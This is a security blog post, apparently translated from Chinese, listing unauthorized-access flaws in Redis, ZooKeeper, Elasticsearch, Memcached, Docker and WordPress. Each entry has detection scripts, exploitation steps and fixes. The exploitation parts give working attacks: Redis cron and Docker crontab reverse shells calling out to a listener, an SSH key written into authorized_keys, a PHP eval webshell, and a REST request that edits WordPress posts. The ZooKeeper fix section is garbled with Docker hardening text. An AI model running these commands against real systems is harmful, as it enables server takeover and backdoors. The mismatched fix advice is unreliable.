Rookie

漫游指南-1 的世界

流浪在大理的斜杠青年
首页标签归档图文关于

Unauthorized Access Vulnerability Summary Detection and Exploitation

#未授权访问110
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document discusses various unauthorized access vulnerabilities in different systems, including Redis, ZooKeeper, Elasticsearch, Memcached, Docker, and WordPress. 1. **Redis Unauthorized Access**: - **Description**: By default, Redis has no authentication, allowing attackers to gain server access if running with root privileges. - **Detection**: A simple socket connection can check for the presence of a Redis version. - **Exploitation**: Attackers can set up a reverse shell using cron jobs, write SSH keys for access, or upload web shells if the server has web services running. - **Mitigation**: Configure Redis to bind to localhost, set a password, and modify the default port. 2. **ZooKeeper Unauthorized Access**: - **Description**: ZooKeeper lacks authentication by default, making it vulnerable to remote exploitation. - **Detection**: A socket connection can check for the ZooKeeper version. - **Exploitation**: Commands can be executed to retrieve server environment details. - **Mitigation**: Avoid exposing ZooKeeper to the public, implement access controls, and bind to specific IPs. 3. **Elasticsearch Unauthorized Access**: - **Description**: Elasticsearch listens on port 9200 without access controls, allowing unauthorized data manipulation. - **Detection**: HTTP requests can check for a successful connection. - **Exploitation**: The API can be accessed to modify data. - **Mitigation**: Block external access, use Nginx for authentication, and configure user access in the settings. 4. **Memcached Unauthorized Access**: - **Description**: Memcached lacks access control, allowing sensitive data retrieval. - **Detection**: A socket connection can check for version information. - **Exploitation**: Successful connections allow access to sensitive data. - **Mitigation**: Limit access to localhost and disable external access. 5. **Docker Unauthorized Access

1 Redis Unauthorized Access Vulnerability#

1.1 Vulnerability Description#

  • After installing Redis, there is no default username and password. If Redis is running with root privileges, it can be used to bounce shells or write SSH keys, thereby gaining access to the server.

1.2 Vulnerability Detection#

import socket 
host = "192.168.254.19"
port = 6384
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send("INFO\r\n")
result = s.recv(1024)
print result//This part can be commented out
if "redis_version" in result:
    print "exist vul"

Test the client connection:

$redis-cli -h host -p port
>CONFIG get requirepass
1) "requirepass"
2) ""
Explanation: Indicates that no password is set, and the default is no password.

1.3 Vulnerability Exploitation#

1.3.1 Exploiting crontab to bounce shells#

Listen on a port on your own server (10.0.0.2)

nc -lvnp 4444

Execute the following command:

redis-cli -h 10.0.0.1
set x "\n* * * * * bash -i >& /dev/tcp/10.0.0.2/4444 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
1.3.2 Writing SSH-keygen public key to login to the server#

Conditions for exploitation:

1. Redis is open to the outside and unauthorized access is allowed (default configuration).
2. The server's SSH is open to the outside and can be logged in with a key.

Detailed attack method is as follows:

Prepare your own public key and write it to a local file text.txt.
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
2. Write the file to memory using Redis
$ redis-cli -h 10.0.0.1 flushall
$ cat test.txt | redis-cli -h 10.0.0.1 -x set crackit
3. Use redis-cli to write the public key to the .ssh directory
$ redis-cli -h 10.0.0.1
10.0.0.1:6379> config set dir /Users/nmask/.ssh/
OK
10.0.0.1:6379> config get dir
1) "dir"
2) "/Users/test/.ssh"
10.0.0.1:6379> config set dbfilename "authorized_keys"
OK
10.0.0.1:6379> save
OK
1.3.3#

Obtain webshell for web service
When Redis has low permissions and the server has a web service running with write permissions to the web directory in Redis, you can try writing a webshell to the web path.

config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php @eval($_POST['test']);?>"
save

Explanation: By executing the above command, the shell can be written to the web directory.

1.4 Vulnerability Fix#

Go to the Redis installation directory and configure the redis.conf file:

  1. Only open to localhost by default
    bind 127.0.0.1
  2. Add login password
    requirepass AbcXXXX
  3. Modify the default port when needed to be open to the outside
    port 2333
  4. Finally, you can also use iptables to restrict access

2 ZooKeeper Unauthorized Access Vulnerability#

2.1 Vulnerability Description#

After installing ZooKeeper, there is no default username and password, which means there is no authentication. It can be remotely exploited by attackers to collect sensitive information from the target server or disrupt the ZooKeeper cluster.

2.2 Vulnerability Detection#

#coding=utf-8
import socket 
ip = "192.168.36.218"
port = 2181
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send("envi")
result = s.recv(1024)
print result #Output detailed response
if "zookeeper.version" in result:
	print "exist vul"

2.3 Vulnerability Exploitation#

Execute the following command to remotely obtain the environment of the server:

echo envi | nc ip port

Connect directly:

./zkCli.sh -server ip:port

2.4 Vulnerability Fix#

  1. Do not expose ZooKeeper directly to the public network if not necessary. If necessary, you can use the following reinforcement methods:
    Set ACL to only allow connections from trusted source IPs;
    Set TLS authentication, official documentation: Protect the Docker daemon socket
  2. The client needs to set the following environment variables when connecting: export DOCKER_TLS_VERIFY=1
export DOCKER_CERT_PATH=~/.docker
export DOCKER_HOST=tcp://10.10.10.10:2375
export DOCKER_API_VERSION=1.12
  1. Add a proxy, such as Nginx, in front of the Docker API server and set up 401 authentication.

3 Elasticsearch Unauthorized Access#

3.1 Vulnerability Description#

ELK is a log analysis tool that listens on port 9200 by default. If access permissions are not set, it can be used for unauthorized data operations.

3.2 Vulnerability Detection#

import httplib, urllib
conn = httplib.HTTPConnection("192.168.254.56",9200, True, 10)
conn.request("GET", '/_cat/master')
resp = conn.getresponse()
print resp.status
if resp.status == 200:
    print "exist vul"

3.3 Vulnerability Exploitation#

It is like an API, anyone accessing this address can call the API to perform data operations.
http://x.x.x.x:9200/_nodes
http://x.x.x.x:9200/_river

3.4 Vulnerability Fix#

  1. Set the firewall to block external access to port 9200.
  2. Use Nginx as a reverse proxy to implement authentication for Elasticsearch.
  3. Restrict IP access and bind to a fixed IP.
  4. Set authentication for port 9200 in config/elasticsearch.yml:
http.basic.enabled true #Switch, enabling it will take over all HTTP connections
http.basic.user "admin" #Account
http.basic.password "admin_pw" #Password
http.basic.ipwhitelist ["localhost", "127.0.0.1"]

4 Memcached Unauthorized Access#

4.1 Vulnerability Description#

Memcached is a commonly used key-value caching system that does not have an access control module. Therefore, attackers can directly read sensitive information from Memcached through command interaction.

4.2 Vulnerability Detection#

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send("stats")
result = s.recv(1024)
if "STAT version" in result:
    print "exist vul"

4.3 Vulnerability Exploitation#

nc -vv <target> 11211

Explanation: If the connection is successful, sensitive information in Memcached can be obtained.

4.4 Vulnerability Fix#

  1. Set Memcached to only allow local access.
  2. Disable external access to Memcached port 11211.
  3. Compile with --enable-sasl to enable SASL authentication.

5 Docker Unauthorized Access#

5.1 Vulnerability Description#

Docker Remote API is a REST API that replaces the remote command line interface (rcli). This API can be accessed through the docker client or http, allowing the creation of containers, deletion of existing containers, and even obtaining a shell on the host machine.

5.2 Vulnerability Detection#

conn = httplib.HTTPConnection(ip, port, True, TIMEOUT)
conn.request("GET", '/containers/json')
resp = conn.getresponse()
if resp.status == 200 and "HostConfig" in resp.read():
    print "exist vul"

5.3 Vulnerability Exploitation#

Get all images

http://host:2375/containers/json

The way to get a shell is similar to the Redis exploitation.

5.3.1 Exploiting cron tasks to bounce shells#
echo -e "*/1 * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",8088));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" >> /etc/crontab

5.3 Vulnerability Fix#

  1. Do not enable Docker's remote API service if not necessary. If necessary, you can use the following reinforcement methods:
    Set ACL to only allow connections from trusted source IPs;
    Set TLS authentication, official documentation: Protect the Docker daemon socket
  2. The client needs to set the following environment variables when connecting: export DOCKER_TLS_VERIFY=1
export DOCKER_CERT_PATH=~/.docker
export DOCKER_HOST=tcp://10.10.10.10:2375
export DOCKER_API_VERSION=1.12
  1. Add a proxy, such as Nginx, in front of the Docker API server and set up 401 authentication.

6 WordPress Unauthorized Access Vulnerability#

6.1 Vulnerability Description#

Attackers can inject malicious content and elevate privileges using this vulnerability, allowing them to modify articles, pages, and other content. REST API was added to WordPress 4.7.0 and enabled by default.

6.2 Vulnerability Exploitation#

View the list of articles:

GET /index.php/wp-json/wp/v2/posts HTTP/1.1

Modify the content of an article:

POST /index.php/wp-json/wp/v2/posts/500?id=500 HTTP/1.1
Host: xxx.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36
Content-Type: application/json
Content-Length: 43
{"title":"x x x x"}

Explanation: If it returns 401, it means there is no permission to modify; if it returns 200, it means the modification was successful.

Reference Articles#

https://www.secpulse.com/archives/61101.html
https://www.secpulse.com/archives/40406.html
http://www.freebuf.com/vuls/126120.html
https://thief.one/2017/12/08/1/

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.